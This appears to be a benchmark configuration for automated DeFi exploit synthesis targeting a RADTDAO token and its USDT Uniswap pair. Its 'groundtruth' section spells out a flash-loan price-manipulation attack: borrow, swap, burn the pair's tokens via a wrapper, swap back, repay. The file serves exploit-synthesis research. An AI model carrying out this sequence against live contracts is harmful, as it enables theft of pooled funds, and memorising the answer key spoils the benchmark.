# Information for benchmarks building.
project_name: "RADTDAO"

ctrt_name2cls:
  - ["radt", "RADTDAO"]
  - ["usdt", "USDT"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]
  - ["wrapper", "Wrapper"]

ctrt_name2deploy:
  - ["radt", "new RADTDAO()"]
  - ["usdt", ""]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]
  - ["wrapper", "new Wrapper(address(radt))"]

extra_actions:
  - "function burn_radt_pair(uint256 amount) internal eurus {
      wrapper.withdraw(address(owner), address(pair), amount);
      pair.sync();
    }"

extra_deployments:
  - "radt.afterDeploy(address(pair), address(wrapper));"

extra_statements: []

attack_goal_str: "usdt"

groundtruth:
  - ["borrow", "usdt", "owner", "1000e18"]
  - ["swap", "pair", "attacker", "usdt", "radt", "usdt.balanceOf(attacker)", "pair.getAmountOut(usdt.balanceOf(attacker), address(usdt))"]
  - ["burn", "radt", "pair", "radt.balanceOf(address(pair)) * 100 / 9"]
  - ["swap", "pair", "attacker", "radt", "usdt", "radt.balanceOf(attacker)", "pair.getAmountOut(radt.balanceOf(attacker), address(radt))"]
  - ["payback", "usdt", "owner", "1000e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "usdt":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "radt":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
    is_burnable: true
  "pair":
    is_swappair: true
    is_uniswap: true
    token_pair: ["usdt", "radt"]
    support_swaps:
      "usdt": ["usdt", "radt"]
      "radt": ["usdt", "radt"]
    is_oracle: true
    oracle: "pair"
    is_lendpool: true

pattern: "Token Burn"
